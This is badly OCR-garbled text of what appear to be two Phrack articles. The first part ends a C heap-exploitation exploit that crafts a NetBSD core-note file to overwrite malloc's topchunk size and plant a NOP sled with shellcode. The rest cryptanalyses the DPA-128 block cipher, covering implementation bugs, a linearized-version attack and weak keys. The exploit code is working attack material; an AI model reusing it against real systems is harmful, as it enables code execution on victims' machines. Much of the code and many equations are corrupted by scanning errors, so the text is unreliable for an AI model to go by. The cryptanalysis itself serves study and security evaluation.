sprintf (ptr, "NetBSD-CORE") ; 
buffer [OFFSET_0_BYTES+24+0x7c]=0; 


// This note entry lets us specify the value that will 
// overwrite the topchunk size 


elfnhdr = (E1f32_Nhdr *) (buffer + OFFSET _OVERWRITE) ; 
elfnhdr->n_namesz = 12; 
elfnhdr->n_descsz = 12; 
elfnhdr->n_type =o; 


ptr = buffer + OFFSET_OVERWRITE + 12; 
sprintf (ptr, "NetBSD-CORE") ; 
// Put the new topchunk size 7 times in memory 
// The note entry program name is at a specific, odd offset (24+0x7c)? 
for (i = 0; i < 7; itt) 
put_longword (buffer + OFFSET_OVERWRITE + 24 + Ox7c + (i * 4), 
topchunk_size) ; 
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// This note entry lets us eat 31 bytes + overhead, but 
// its real purpose is to load the shellcode in memory. 
// We assume that its name is 31 bytes long. 


elfnhdr = (E1f£32_Nhdr *) (buffer + OFFSET_SHELLCODE) ; 
elfnhdr->n_namesz = 12; 
elfnhdr->n_descsz ="123 
elfnhdr->n_type = 13 


ptr = buffer + OFFSET_SHELLCODE + 12; 

sprintf (ptr, "NetBSD-CORE") ; 

sprintf (buffer + OFFSET_SHELLCODE + 24 + Ox7c, 
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB") ; 


// Fill this memory region with our shellcode. 

// Remember to leave the not ntry untouched ... 

memset (buffer + OFFSET _SHELLCODE + 256, 0x90, 4096-256); 
sprintf (buffer + 8191 - strlen (scode), scode); 


fp = open_fil (filename) ; 


if (fwrite (buffer, 8192, 1, fp) !=0) { 
printf ("--[ The file has been written\n"); 
} else { 
printf ("--[ Can not write to the file\n"); 


exit: (1) 
} 
fclose (fp); 


free (shead); 
free (math); 
free (buffer); 
free (filename) ; 


return 0; 


--[{ 7 - Final words 


That’s all for the details of this technique; a lot has already been said 
through this paper. By looking at the complexity of the malloc code, there 
are probably many other ways to take control of a process by corrupting the 
malloc chunks. 
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--{ 1 - Introduction 


While the cracking scene has grown with cryptology thanks to the evolution 
of binary protection schemes, the hacking scene mostly hasn’t. This fact 
is greatly justified by the fact that there were globally no real need. 
Indeed it’s well known that if a hacker needs to decrypt some files then 
he will hack into the box of its owner, backdoor the system and then use 
it to steal the key. A cracker who needs to break a protection scheme will 
not have the same approach: he will usually try to understand it fully in 
order to find and exploit design and/or implementation flaws. 


Although the growing of the security industry those last years changed a 
little bit the situation regarding the hacking community, nowadays there 
are still too many people with weak knowledge of this science. What is 
disturbing is the broadcast of urban legends and other hoax by some 
paranoids among them. For example, haven’t you ever heard people claiming 
that government agencies were able to break RSA or AES? A much more clever 
question would have been: what does "break" mean? 


A good example of paranoid reaction can be found in M11tOn’s article 
[FakeP63]. The author who is probably skilled in hacking promotes the use 
of "home made cryptographic algorithms" instead of standardized ones such 
as 3DES. The corresponding argument is that since most so-called security 
experts lake coding skills then they aren’t able to develop appropriate 
tools for exotic ciphers. While I agree at least partially with him 
regarding the coding abilities, I can’t possibly agree with the main 
thesis. Indeed if some public tools are sufficient to break a 3DES based 
protection then it means that a design and/or an implementation mistake 
was/were made since, according to the state of the art, 3DES is still 
unbroken. The cryptosystem was weak from the beginning and using "home 
made cryptography" would only weaken it more. 
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It is therefor xtremely important to understand cryptography and to 
trust the standards. In a previous Phrack issue (Phrack 62), Veins exposed 
to the hacking community a "home made" block cipher called DPA (Dynamic 
Polyalphabetic Algorithms) [DPA128]. In the following paper, we are going 
to analyze this cipher and demonstrate that it is not flawless - at least 
from a cryptanalytic perspective - thus fitting perfectly with our talk. 


--[ 2 - A short word about block ciphers 
Let’s quote a little bit the excellent HAC [MenVan]: 


"A block cipher is a function which maps n-bit plaintext blocks to n-bit 
ciphertext blocks; n is called the blocklength. It may be viewed as a 
simple substitution cipher with large character size. The function is 
parametrized by a k-bit key K, taking values from a subset |K (the key 
space) of the set of all k-bit vectors Vk. It is generally assumed that 
the key is chosen at random. Use of plaintext and ciphertext blocks of 
equal size avoids data expansion." 


Pretty clear isn’t it? :> So what’s the purpose of such a cryptosystem? 
Obviously since we are dealing with encryption this class of algorithms 
provides confidentiality. Its construction makes it particularly suitable 
for applications such as large volumes encryption (files or HD for 
xample). Used in special modes such as CBC (like in OpenSSL) then it can 
also provide stream encryption. For example, we use AES-CBC in the WPA2, 
SSL and SSH protocols. 


Remark: When used in conjunction with other mechanisms, block ciphers can 
also provide services such as authentication or integrity (cf part 8 of 
the paper). 


An important point is the understanding of the cryptology utility. While 
cryptography aims at designing best algorithms that is to say secure and 
fast, cryptanalysis allows the evaluation of the security of those 
algorithms. The more an algorithm is proved to have weaknesses, the less 
we should trust it. 


[ 3 Overview of block cipher cryptanalysis 


The cryptanalysis of block ciphers evolved significantly in the 90s with 
the apparition of some fundamental methods such as the differential 
[BiSha90] and the linear [Matsui92] cryptanalysis. In addition to some 
more recent ones like the boomerang attack of Wagner or the chi square 
cryptanalysis of Vaudenay [Vaud], they constitute the set of so-called 
statistical attacks on block ciphers in opposition to the very recent and 
still controverted algebraic ones (see [CourtAlg] for more information). 


Today the evolution of block cipher cryptanalysis tends to stabilize 
itself. However a cryptographer still has to acquire quite a deep knowledge 
of those attacks in order to design a cipher. Reading the Phrack paper, we 
think - actually we may be wrong - that the author mostly based his design 
on statistical tests. Although they are obviously necessary, they can’t 
possibly be enough. Every component has to be carefully chosen. We 
identified several weaknesses and think that some more may still be left. 


--[ 4 - Veins’ DPA-128 description 


DPA-128 is a 16 rounds block cipher providing 128 bits block encryption 
using ann bits key. Each round encryption is composed of 3 functions 


which are rbytechain(), rbitshift() and S_E(). Thus for each input block, 
we apply the E() function 16 times (one per round) 


void E (unsigned char *key, unsigned char *block, unsigned int shift) 


{ 


rbytechain (block); 
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rbitshift (block, shift); 
S_E (key, block, shift); 


} 


where: 


- block is the 128b input 
-— shift is a 32b parameter dependent of the round subkey 
—- key is the 128b round subkey 


Consequently, the mathematical description of this cipher is: 
£1 |.Pse. [FR eS Se ee (eC 


where: 
- |P is the set of all plaintexts 
- |K is the set of all keys 
- |C is the set of all ciphertexts 


For p element of |P, k of |K and c of |C, we have c = f(p,k) 
with f = EE...EE = E*%16 and meaning the composition of functions. 


We are now going to describe each function. Since we sometimes may need 
mathematics to do so, we will assume that the reader is familiar with 
basic algebra ;> 


rbytechain() is described by the following C function: 


void rbytechain(unsigned char *block) 


{ 


Tne. hy 
for (i = 0; i < DPA_BLOCK_SIZE; ++i) 

block[i] *= block[(i + 1) % DPA_BLOCK_SIZE]; 
return; 


} 


where: 
- block is the 128b input 
— DPA_BLOCK_SIZE equals 16 


Such an operation on bytes is called linear mixing and its goal is to 
provide the diffusion of information (according to the well known Shannon 
theory). Mathematically, it’s no more than a linear map between two GF (2) 
vector spaces of dimension 128. Indeed, if U and V are vectors over GF (2) 
representing respectively the input and the output of rbytechain() then 

V = M.U where M is a 128x128 matrix over GF(2) of the linear map where 
coefficients of the matrix are trivial to find. Now let’s see rbitshift(). 
Its C version is: 


void rbitshift (unsigned char *block, unsigned int shift) 
{ 


unsigned int i; 

unsigned int div; 

unsigned int mod; 

unsigned int rel; 

unsigned char mask; 

unsigned char remainder; 

unsigned char sblock [DPA_BLOCK_SIZ!I 


GI 
pan 
x 


if (shift) 

{ 
mask = 0; 
shift %= 128; 


div = shift / 8; 

mod = shift % 8; 

rel = DPA _BLOCK_SIZE - div; 

for (i = 0; i < mod; ++i) 
mask |= (1 << i); 
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for (i = 0; i < DPA_BLOCK_SIZE; ++i) 
{ 
remainder = 
((block[ (rel + i - 1) % DPA_BLOCK_SIZE]) & mask) << (8 - mod); 
sblock[i] = 
((block[ (rel + i) % DPA_BLOCK_SIZE]) >> mod) | remainder; 


} 
} 
memcpy (block, sblock, DPA_BLOCK_SIZE) ; 


where: 
- block is the 128b input 
— DPA_BLOCK_SIZE equals 16 
—- shift is derived from the round subkey 


Veins describes it in his paper as a key-related shifting (in fact it has 

to be a key-related ’rotation’ since we intend to be able to decrypt the 
ciphertext ;)). A careful read of the code and several tests confirmed that 
it was not erroneous (up to a bug detailed later in this paper), so we can 
describe it as a linear map between two GF(2) vector spaces of dimension 128. 


Indeed, if V and W are vectors over GF(2) representing respectively th 
input and the output of rbitshift() then: 


W = M’.V where M’ is the 128x128 matrix over GF(2) of the linear 
map where, unlike the previous function, coefficients of the matrix are 


unknown up to a probability of 1/128 per round. 


Such a function also provides diffusion of information. 


Finally, the last operation S_E() is described by the C code: 


void S_E (unsigned char *key, unsigned char *block, unsigned int s) 


{ 


Int: <2; 
for (i = 0; i < DPA _BLOCK_SIZE; ++i) 
block[i] = (key[i] + block[i] + s) % 256; 
return; 
} 
where 


- block is the 128b input 

— DPA_BLOCK_SIZE equals 16 

- s is the shift parameter described in the previous function 
—- key is the round subkey 


The main idea of veins’ paper is the so-called "polyalphabetic substitution" 
concept, whose implementation is supposed to be the S_E() C function. 
Reading the code, it appears to be no more than a key mixing function over 
GF(2°8) . 


Remark: We shall see later the importance of the mathematical operation 


know as ‘addition’ over GF(2%8). Regarding the key scheduling, each cipher 
round makes use of a 128b subkey as well as of a 32b one deriving from it 
called "shift". The following pseudo code describes this operation: 
skey(0) = checksum128 (master_key) 
for i = 0, nbr_round-2: 
skey (itl) = checksuml128 (skey (i) ) 
skey(0) = skey(15) 
for i = 0, nbr_round-l1: 
shift (nbr_round-1 - i) = hash32(skey(i)) 


where skey(i) is the i’th subkey. 


It is not necessary to explicit the checksum128() and hash32(), the reader 
just has to remind this thing: whatever the weakness there may be in those 
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functions, we will now consider them being true oneway hash functions 
providing perfect entropy. 


As a conclusion, the studied cipher is closed to being a SPN (Substitution 
— Permutation Network) which is a very generic and well known construction 
(AES is one for example). 


--[ 4.1 - Bugs in the implementation 


Although veins himself honestly recognizes that the cipher may be weak and 
"strongly discourages its use" to quote him [DPA128], some people could 
nevertheless decide to use it as a primitive for encryption of personal 
and/or sensitive data as an alternative to ’already-cracked-by-NSA’ 
ciphers [NSA2007]. Unfortunately for those theoretical people, we were abl 
to identify a bug leading to a potentially incorrect functioning of the 
cryptosystem (with a non negligible probability). 


We saw earlier that the bitshift code skeleton was the following: 


/* bitshift.c */ 
void {r,l}bitshift (unsigned char *block, unsigned int shift) 
{ 


[...] // SysK : local vars declaration 
unsigned char sblock[DPA_BLOCK_SIZE]; 
if (shift) 


{ 
[...] // SysK : sblock initialization 


} 
memcpy (block, sblock, DPA_BLOCK_SIZE) ; 


} 


Clearly, if ’shift’ is 0 then ’block’ is fed with stack content! Obviously 
in such a case the cryptosystem can’t possibly work. 


Since shift is an integer, such an event occurs with at least a theoretical 
probability of 1/2%*32 per round. 


Now let’s study the shift generation function: 


/* hash32.c */ 

/* 

* This function computes a 32 bits output out a variable length input. It is 
* not important to have a nice distribution and low collisions as it is used 
* on the output of checksum128() (see checksum128.c). There is a requirement 
* though, the function should not consider \0 as a key terminator. 


Bef. 


unsigned long hash32 (unsigned char *k, unsigned int length) 
{ 

unsigned long h; 

for (h = 0; *k && length; ++k, --length) 

h = 13 * h + *k; 

return (h); 


} 


As stated in the C code commentary, hash32() is the function which produces 
the shift. Although the author is careful and admits that the output 
distribution may not be completely uniform (not exactly equal probability 
for each byte value to appear) it is obvious that a strong bias is not 
desirable (Cf 7.3). 


However what happens if the first byte pointed by k is 0 ? Since the loop 
ends for k equal to 0, then h will be equal to 13 * 0 + 0 = 0. Assuming 
that the underlying subkey is truly random, such an event should occur with 
a probability of 1/256 (instead of 1/2%32). Since the output of hash32() is 
an integer as stated in the comment, this is clearly a bug. 
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We could be tempted to think that this implementation failure leads to a 
weakness but a short look at the code tells us that: 


struct s_dpa_sub_key { 
unsigned char key[DPA_KEY_SIZE]; 
unsigned char shift; 


}; 


typedef struct s_dpa_sub_key DPA_SUB_KEY; 


Therefore since shift is a char object, the presence of "*k &&" in the code 
doesn’t change the fact that the cryptosystem will fail with a probability 
of 1/256 per round. 


Since the bug may appear independently in each round, the probability of 
failure is even greater: 


p("fail") = 1 ws p ("ok") 

1 - Mul( p("ok in round i") ) 
1 - (255/256) %*16 

= 0.0607... 


where i is element of [0, (nbr_rounds - 1)] 
It’s not too far from 1/16 :-) 


Remark: We shall see later that the special case where shift is equal to 0 
is part of a general class of weak keys potentially allowing an attacker to 
break the cryptosystem. 


Hunting weaknesses and bugs in the implementation of cryptographic 
primitives is the common job of some revers ngineers since it sometimes 
allows to break implementations of algorithms which are believed to be 
theoretically secure. While those flaws mostly concern asymmetric 
primitives of digital signature or key negotiation/generation, it can also 
apply in some very specific cases to the block cipher world. 


From now, we will consider the annoying bug in bitshift() fixed. 


--[ 4.2 - Weaknesses in the design 


When designing a block cipher, a cryptographer has to be very careful about 
every details of the algorithm. In the following section, we describe 
several design mistakes and explain why in some cases, it can reduce the 
security of the cipher. 


a) We saw earlier that the E() function was applied to each round. However 
such a construction is not perfect regarding the first round. Since 
rbytechain() is a linear mixing operating not involving key material, it 
shouldn’t be used as the first operation on the input buffer since its 
effect on it can be completely canceled. Therefore, if a cryptanalyst wants 
to attack the bitshift() component of the first round, he just have to 
apply lbytechain() (the rbytechain() inverse function) to the input vector. 
It would thus have been a good idea to put a key mixing as the first 
operation. 


b) The rbitshift() operation only need the 7 first bits of the shift 
character whereas the S_E() uses all of them. It is also generally 
considered a bad idea to use the same key material for several operations. 


c) If for some reason, the attacker is able to leak the second (not the 
first) subkey then it implies the compromising of all the key material. Of 
course the master key will remain unknown because of the onewayness of 
checksum128() however we do not need to recover it in order to encrypt 
and/or decrypt datas. 


d) In the bitshift() function, a loop is particularly interesting: 
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for (i = 0; i < mod; ++i) 
mask |= (1 << i); 


What is interesting is that the time execution of the loop is dependent of 
"mod" which is derived from the shift. Therefore we conclude that this loop 
probably allows a side channel attack against the cipher. Thanks to X for 
having pointed this out ;> In the computer security area, it’s well known 
that a single tiny mistake can lead to the total compromising of an 
information system. In cryptography, the same rules apply. 


--[ 5 - Breaking the linearized version 


Even if we regret the non justification of addition operation employment, 
it is not the worst choice in itself. What would have happen if the key 
mixing had been done with a xor operation over GF(2%8) instead as it is the 
case in DES or AES for example? 


[To measure the importance of algebraic consideration in the security of a 
block cipher, let’s play a little bit with a linearized version of the 
cipher. That is to say that we replace the S_E() function with the 
following S_E2() where 


void S_E2 (unsigned char *key, unsigned char *block, unsigned int s) 


int 1; 

for (i = 0; i < DPA_BLOCK_SIZE; ++i) 
block[i] = (key[i] * block[i] * s) % 256; [1] 
// + is replaced by xor 

return; 


} 


If X, Y and K are vectors over GF(2%8) representing respectively the input, 
the output of S_E2() and the round key material then Y = X xor K. 


Remark: K = sK xor shift. We use K for simplification purpose. 


Now considering the full round we have 


V = M.U a] (rbytechain) 

W=M’.V b] (rbitshift) 

Y = W xor K c] (S_E2) 

Linear algebra allows the composition of applications rbytechain() and 
rbitshift() since the dimensions of M and M’ match but W in [b] is a vector 
over GF(2) whereas W in [c] is clearly over GF(2%8). However, due to the 
use of XOR in [c], Y, W and K can also be seen as vectors over GF(2). 
Therefore, S_E2() is a GF(2) affine map between two vector spaces of 


dimension 128. 
We then have: 
Y = M’ .M.U xor K 


The use of differential cryptanalysis will help us to get rid of the key. 
Let’s consider couples (U0,YO0 = E(U0)) and (U1,Y1 = E(U1)) then: 


DELTA(Y) = YO xor Y1 
= (M’.M.U0O xor K) xor (M’.M.U1 xor K) 
= (M’.M.U0O xor M’.M.U1) xor K xor K (commutativity & 
associativity of xor) 
= (M’.M). (UO xor U1) (distributivity) 


: il 
= (M’ .M) .DELTA(U) 


Such a result shows us that whatever sK and shift are, there is always a 
linear map linking an input differential to the corresponding output 
differential. 
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The generalization to the 16 rounds using matrix multiplication is obvious. 
Therefore we have proved that there exists a 128x128 matrix Mf over GF (2) 
such as DELTA(Y) = Mf.DELTA(X) for the linearized version of the cipher. 


Then assuming we know one couple (U0,Y0O) and Mf, we can encrypt any input U. 
Indeed, Y xor YO = Mf.(U xor UO) therefore Y = (Mf.(U xor UO)) xor YO. 


Remark 1: The attack doesn’t give us the knowledge of subkeys and shifts 
but such a thing is useless. The goal of an attacker is not the key in 
itself but rather the ability of encrypting/decrypting a set of 
plaintexts/ciphertexts. Furthermore, considering the key scheduling 
operation, if we really needed to recover the master key, it would be quite 
a pain in the ass considering the fact that checksum128() is a one way 
function ;-) 


Remark 2: Obviously in order to decrypt any output Y we need to calculate 
Mf*-1 which is the inverse matrix of Mf. This is somewhat more interesting 
isn’t. tt 2 2-) 


Because of rbitshift(), we are unable to determine using matrix 
multiplications the coefficients of Mf. An exhaustive search is of course 
impossible because of the huge complexity (2%16384) however, finding them 
is equivalent to solving 128 systems (1 system per row of Mf) of 128 
variables (1 variable per column) in GF(2). To build such a system, we need 
128 couples of (cleartext,ciphertext). The described attack was implemented 
using the nice NTL library ([SHOUP]) and can be found in annexe A of this 
paper. 


S g++ break_linear.cpp bitshift.o bytechain.o key.c hash32.0 checksum128.0 
-o break_linear -lntl -lcrypto -I include 

S ./break_linear 

[+] Generating the plaintexts / ciphertexts 
[+] NTL stuff ! 
[+] Calculation of Mf 
[+] 
[+] 


Let’s make a test ! 
Well done boy :> 


Remark: Sometimes NTL detects a linear relation between chosen inputs 
(DELTA_X) and will then refuse to work. Indeed, in order to solve the 128 
systems, we need a situation where every equations are independent. If it’s 
not the case, then obviously det (M) is equal to 0 (with probability 1/2). 
Since inputs are randomly generated, just try again until it works :-) 


./boreak_linear 
] Generating the plaintexts / ciphertexts 
] NTL stuff ! 

et (M) = 0 


$ 
[ 
[ 
d 
As a conclusion we saw that the linearity over GF(2) of the xor operation 
allowed us to write an affine relation between two elements of GF(2)%°128 in 
the S_E2() function and then to easily break the linearized version using a 
128 known plaintext attack. The use of non linearity is crucial in the 


design. Fortunately for DPA-128, Veins chose the addition modulo 256 as the 
key mixer which is naturally non linear over GF(2). 


--[ 6 - On the non linearity of addition modulo n over GF (2) 


The bitshift() and bytechain() functions can be described using matrix over 
GF(2) therefore it is interesting to use this field for algebraic 
calculations. 


The difference between addition and xor laws in GF(2%n) lies in the carry 
propagation: 


w(i) + k(i) = w(i) xor k(i) xor carry (i) 
where w(i), k(i) and carry(i) are elements of GF(2). 
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We note w(i) as the i’th bit of w and will keep this notation until the end. 
carry(i), written c(i) for simplification purpose, is defined recursively: 


e(itl) = w(i 


).k(i) xor w(i).c(i) xor k(i).c(i) 
with c(0) = 0 


Using this notation, it would thus be possible to determine a set of 
relations over GF(2) between input/output bits which the attacker controls 
using a known plaintext attack and the subkey bits (which the attacker 
tries to guess). 


However, recovering the subkey bits won’t be that easy. Indeed, to determine 
them, we need to get rid of the carries replacing them by multivariate 
polynomials were unknowns are monomials of huge order. 


Remark 1: Because of the recursivity of the carry, the order of monomials 
grows up as the number of input bits per round as well as the number of 
rounds increases. 


Remark 2: Obviously we can not use intermediary input/output bits in our 
equations. This is because unlike the subkey bits, they are dependent of the 
input. 


We are thus able to express the cryptosystem as a multivariate polynomial 
system over GF(2). Solving such a system is NP-hard. There exists methods 
for system of reasonable order like groebner basis and relinearization 
techniques but the order of this system seems to be far too huge. 


However for a particular set of keys, the so-called weak keys, it is 
possible to determine the subkeys quite easily getting rid of the complexity 
introduced by the carry. 


--[ 7 - Exploiting weak keys 


Let’s first define a weak key. According to wikipedia: 


"In cryptography, a weak key is a key which when used with a specific 
cipher, makes the cipher behave in some undesirable way. Weak keys usually 
represent a very small fraction of the overall keyspace, which usually 
means that if one generates a random key to encrypt a message weak keys ar 
very unlikely to give rise to a security problem. Nevertheless, it is 
considered desirable for a cipher to have no weak keys." 


Actually we identified a particular subset |W of |K allowing us to deal 
quite easily with the carry problem. A key "k" is part of |W if and only if 
for each round the shift parameter is a multiple of 8. The reader should 
understand why later. 


We will first present the attack on a reduced version of DPA for simplicity 
purpose and generalize it later to the full version. 


--[ 7.1 - Playing with a toy cipher 


Our toy cipher is a 2 rounds DPA. Moreover, the cipher takes as input 4*8 
bits instead of 16*8 = 128 bits which means that DPA_BLOCK_SIZE = 4. We 
also make a little modification in bytechain() operation. Let’s remember 
the bytechain() function: 


void rbytechain(unsigned char *block) 
{ 
int 1; 
for (i = 0; i < DPA_BLOCK_SIZE 
block[i] *= block[(i + 1) 
return; 


++i) 
DPA_BLOCK_SIZE]; 


ole =e 
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Since block is both input AND output of the function then we have for 


U(0) 


DPA _BLOCK_SIZE = 4: 
V(0O) = U(O) xor U(1) 
V(1l) = U(1) xor U(2) 
V(2) = U(2) xor U(3) 
V(3) = U(3) xor V(0) = 

Where V(x) is the x’th byte element. 

Thus with our modification: 
V(0O) = U(0O) xor U(1) 
V(1) = U(1) xor U(2) 
V(2) = U(2) xor U(3) 
V(3) = U(3) xor U(0) 


xor U(1) 


xor U(3) 


Regarding the mathematical notation 


Xj (4) 


xor wi 
All cal 


How 
However, 


U,V,W,Y vector notation of section 
is the i’th bit of vector Xj 
UO vector is equivalent to P where 
m is the shift of round 0 

n is the shift of round 1 

11 be written 
culation of subscript wil 


did we choose 
if k is a weak key 


(pay your ascii !@#): 
5 remains. 
where j is j’th round. 


P is a plaintext. 


™+’ since calculation is done in GF(2) 


1 be done in the ring 22Z_32 


|W? Using algebra in GF (2) 
(part of |W), 


implies to deal with the carry. 
then we can manage the calculation 


so that it’s not painful anymore. 


Let i be the lowest bit of any input byt Therefore for each i part of the 
set {0,8,16,24} we have: 
u0 (i) = p(i) 
v0 (i) = p(i) + p(its) 
w0O (itm) = v0(i) 
yO (i) = wO(i) + kO(i) + CO(i) 
yO (itm) wO (itm) + kO(itm) + CO (itm) 
yO (i+m) = p(i) p(its) kO (itm) CO (itm) /* carry(0) = 0 */ 
yO (itm) = p(i) p(it+8) kO (itm) 
ul (i) = y0(i) 
v1 (i) = yO(i) + yO(i+t8) 
wl (itn) = v1(i) 
yl (i) = wl(i) + k1(i) + Cl1(i) 
yl (itn) wl (itn) kl (itn) + Cl (itn) 
yl (itn) = y0(i) yO (it8) k1 (itn) C1 (itn) 
yl (i+ntm) yO (i+m) yO (i+mt+8) k1 (itn+m) Cl(it+ntm) /* carry(0) = 0 */ 
yl (itn+m) p (i) p(its) kO (itm) p(its) p(itle6) 
+ kO (itm+8) k1 (i+n+m) 
yi (itn+m) p(i) kO (itm) + p(itl6) + kO(itmt+8) + k1(i+n+m) 
As stated before, i is part of the set {0,8,16,24} so we can write 
yl (n+m) p (0) + kO(m) + p(16) kO (m+8) k1 (n+m) 
yl(8tntm) = p(8) ae p (24) kO (m+16) k1 (8+n+m) 
yl (16+n+m) p(16) + k0O(16+m) p (0) kO (m+24) k1 (16+n+m) 
yl (24+n+m) p(24) + k0(24+m) p(8) + k0O(m) + k1(24+n+m) 
In the case of a known plaintext attack, the attacker has the knowledge of 
a set of couples (P,Y1). Therefore considering the previous system, the 
lowest bit of KO and Kl vectors are the unknowns. Here we have a system 
which is clearly underdefined since it is composed of 4 equations and 


4*2 unknowns. It 


will give us the relations between each lowest bit of Y 


and the lowest bits of KO and Kl. 


Remark 1: 


n,m are unknown. 


A trivial approach is to determine them which 
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app] 


lying the same idea to the full 16 rounds would cost us 


(2°4)*16 = 2°64! Such a complexity is a pain in the ass even nowadays 


a) 


(n+m) as it costs 2*%4 what ever the 
It gives us the opportunity to write relations between 


A much better approach is to guess 
number of rounds. 


some input and output bits. We do not need to know exactly m and n. The 
knowledge of the intermediate variables kO(xt+m) and kl(ytnt+m) is 
sufficient. 

Remark 2: An underdefined system brings several solutions. We are 


thus able to choose arbitrarily 4 variables thus fixing them with values of 
our choice. Of course we have to choose so that we are able to solve the 
system with remaining variables. For example taking kO(m), kO(m+8) and 

kl (ntm) together is not fine because of the first equation. However, fixing 
all the k0(x+m) may be a good idea as it automatically gives the k1(y+n+m) 
corresponding ones. 


Now let’s go further. Let i be part of the set {1,9,17,25}. We can write: 


u0 (i) p (i) 
v0 (i) = p(i) + p(its) 
w0O (itm) = v0(i) 
yO (1) = wO(i) + kO(i) + w0(i-1) *k0O(i-1) 
yO (itm) wO0 (itm) + kO(it+m) + w0(itm-1)*k0(i+m-1) 
yO (itm) = p(i) p (its) kO (i+m) w0O (itm-1) *k0O (it+tm-1) 
yO (itm) = p(i) p(it+s) kO (itm) (p(i-1) p(i-1+8) )*k0O(itm-1) 
ul (i) = y0(i) 
v1 (i) = yO(i) + yO(it8) 
wl (itn) = v1(i) 
yl (i) = wl(i) + k1l(i) + Cl1(i) 
yl (i) = wl(i) + k1l(i) + wil (i-1) *k1(i-1) 
yl (itn) wil (itn) kl (itn) + wil (i-1l+n) *k1(i-1+n) 
yl (itn) = y0(i) yO (it8) kl (itn) (yO(i-1) + yO(it8-1)) * k1(i-1+n) 
yi (itn+m) yO (itm) yO (itm+8) k1 (i+m+n) 
+ (yO(itm-1) + yO(it+m+8-1)) * k1(itmtn-1) 
yl (itn+m) p(i) p (its) kO (itm) + (p(i-1) p(i-1+8)) * kO(itm-1) 
p(it8) + p(itl16) kO (it+m+8) 
(p(i+8-1) p(i-1+16)) * k0O(itm-1+8) 
k1 (i+n+m) 
kl (itmtn-1) * [p(i-1) + p(it8-1) kO (it+m-1) ] 
kl (itmtn-1) * [p(i-1+8) + p(it+l16-1) + kO(itm-1+8) ] 
yl(itntm) = p(i) + kO(itm) + (p(i-1) + p(i-1+8)) * kO(i+m-1) 
p(itl6) + kO(itm+s8) (p (i+8-1) p(i-1+16)) * kO(itm-1+8) 
k1 (i1+n+m) 
k1 (it+tmtn-1) * [p (i-1) kO (itm-1) ] 
k1 (i+mtn-1)*[p(i-1+16) + kO(itm-1+8) ] 
Thanks to the previous system resolution, we have the knowledge of 
kO (itm+tn-1+x) and kl(i+m-lt+y) variables. Therefore, we can reduce the 
previous equation to: 
A(i) kO(it+m) + kO(it+m+8) + kl (it+n+m) (alpha) 


where A(i) is a known value for the attacker. 


Remark 1: This equation represents the same system as found in case of i 
being the lowest bit! Therefore all previous remarks remain. 
Remark 2: If we hadn’t have the knowledge of k0O(i+mt+tn-1+x) and kl (itm-1+ty) 


bits then the number of variables would have grown seriously. Moreover we 
would have had to deal with some degree 2 monomials :-/. 
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We can thus conjecture that the equation alpha will remain true for each i 
part of {a,a+8,at+1l6,a+24} where 0 <= a < 8. 


--[ 7.2 - Generalization and expected complexity 


Let’s deal with the real bytechain() function now. 
As stated before and for DPA_BLOCK_SIZE = 4 we have: 


0) xor 
1) xor 
2) xor 
0) xor 


aa<ac 
ll 


(0 
(1 
(2 
(3 xor U(3) 

This is clearly troublesome as the last byte V(3) is NOT calculated like 


V(0), V(1) and V(2). Because of the rotations involved, we wont be able to 
know when the bit manipulated is part of V(3) or not. 


Therefore, we have to use a general formula: 


a(i).U(it2) 
24 to 31 


V(i) = U 
where a( 


Te SY, 
) 


For i part of {0,8,16,24} we have: 


u0 (i) p (i) 

v0 (i) = p(i) + p(it8) + ad(i).p(itl16é) 

w0O (itm) = v0(i) 

yO (1) = wO(i) + k0O(i) + CO(i) 

yO (itm) wO (itm) + kO(itm) + CO (itm) 

yO (itm) = p(i) p (its) aO(i).p(it1l6) + kO(itm) + CO(it+m) /*carry(0) = O*/ 
yO (itm) = p(i) p (its) + aO(i).p(itl6) + kO(it+m) 


ul (i) = y0 (i) 
v1 (i) = yO(i) + yO(it8) + al(i).y0(it16) 
wl (itn) = v1(i) 
yl (i) = wl(i) + k1l(i) + Cl1(i) 
yl (itn wil (itn) kl (itn) + Cl (itn) 
yl(itn = y0(i) yO (it8) al(i).yO(it16) + kl (itn) + Cl (itn) 
yi (itn+m) yO (itm) yO(itm+8) + al(itm) .y0O(itm+16) k1 (i+n+m) 
yl (itntm) p(i) + p(it8) + aO(i).p(itl6) + kO (itm) 

p(it8) + p(itl16) a0(i).p(it24) + kO(it+m+8) 

al(itm).[p(it+16) p(it+24) aQ(i).p(i) + kO(itm+16))] + ki (it+n+m) 
yl(itntm) = p(i) + aO(i).p(it+l6) + kO (itm) 

+ p(itl6) + a0(i).p(it24) + kO(i+m+8) 
al(itm) .[p(it16) p(it+24) aQ(i).p(i) + kO(itm+16))] + ki (i+n+m) 


aQ(i) is not a problem since we know it. This is coherent with the fact 
that the first operation of the cipher is rbytechain() which is invertible 
for the attacker. However, the problem lies in the al(it+m) variables. 


Guessing al(itm) is out of question as it would cost us a complexity of 
(2°4)*15 = 2°60 for the 16 rounds! The solution is to consider al(itm) as 
an other set of 4 variables. We can also add the equation to our system: 


al(m) + al(m+8) al(m+16) + al (m+24) 1 
This equation will remain true for other bits. 


So what is the global complexity? Obviously with DPA_BLOCK_SIZE = 16 each 
system is composed of 16+1 equations of 16+1 variables (we fixed th 
others). Therefore, the complexity of the resolution is: 

Leg tl 73) 7 Log2h<~ BALLS 


We will solve 8 systems since there are 8 bits per byte. Thus the global 
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complexity is around (2%13)*8 = 2%16. 
Remark: We didn’t take into account the calculation of equation as it is 


assumed to be determined using a formal calculation program such as pari-gp 
or magma. 


--[ 7.3 - Cardinality of |W 


What is the probability of choosing a weak key? We have seen that our weak 
key criterion is that for each round, the rotation parameter needs to be 
multiple of 8. Obviously, it happens with 16 / 128 = 1/8 theoretical 
probability per round. Since we consider subkeys being random, the 
generation of rotation parameters are independent which means that the 
overall probability is (1/16)*%16 = 1/2%64. 


Although a probability of 1/2*%64 means a (huge) set of 2°64 weak keys, in 
the real life, there are very few chances to choose one of them. In fact, 
you probably have much more chances to win lottery ;) However, two facts 

must be noticed: 


We presented one set of weak keys but there be some more! 
—- We illustrated an other weakness in the conception of DPA-128 


Remark: A probability of 1/8 per round is completely theoretic as it 
supposes a uniform distribution of hash32() output. Considering the extreme 
Simplicity of the hash32() function, it wouldn’t be too surprising to be 
different in practice. Therefore we made a short test to compute the real 
probability (Annexe B). 


S gcc test.hash32.c checksum128.0 hash32.0 -o test.hash32 -03 
fomit-—frame-pointer 

S time ./test.hash32 

[+] Probability is 0.125204 


real 0m14.654s 
user 0m14.649s 
sys 0m0.000s 


S$ gp -q 

